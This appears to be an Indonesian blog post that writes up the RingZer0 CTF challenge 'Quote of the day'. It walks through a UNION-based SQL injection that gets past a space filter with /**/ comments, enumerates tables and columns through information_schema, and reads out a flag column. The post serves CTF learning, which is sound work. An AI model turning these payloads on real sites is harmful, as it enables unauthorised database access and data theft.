Sunday, December 9, 2018

[RingZer0] Quote of the day - SQL INJECTION

disoal ini diberikan sebuah web, ketika saya pencet generate button maka muncul sebuah quote dan terdapat parameter GET dengan nama id dengan value 2, lalu saya coba beri tanda ' ternyata tidak ada error apa-apa.


selanjutnya saya coba dengan UNION SELECT ternyata hasilnya muncul pesan UNIONSELECT sepertinya saya tidak bisa menggunakan spasi karena difilter, tetapi masih bisa diakali dengan /**/ Query "/**/UNION/**/SELECT/**/1,2#" karena terdapat dua kolom.

selanjutnya melihat table yang terdapat pada database dengan Query "/**/UNION/**/SELECT/**/1,table_name/**/FROM/**/information_schema.tables/**/WHERE/**/table_schema=database()#", ternyata ternyata terdapat 2 table.

selanjutnya mencari kolumn saya pakai Query "/**/UNION/**/SELECT/**/1,column_name/**/FROM/**/information_schema.columns/**/WHERE/**/table_schema=database()#", terdapat beberapa kolumn namun saya fokus pada kolumn flag.

melihat isi kolumn dengan Query "/**/UNION/**/SELECT/**/1,flag/**/FROM/**/alkdjf4iu#", maka flag akan muncul.

No comments:

Post a Comment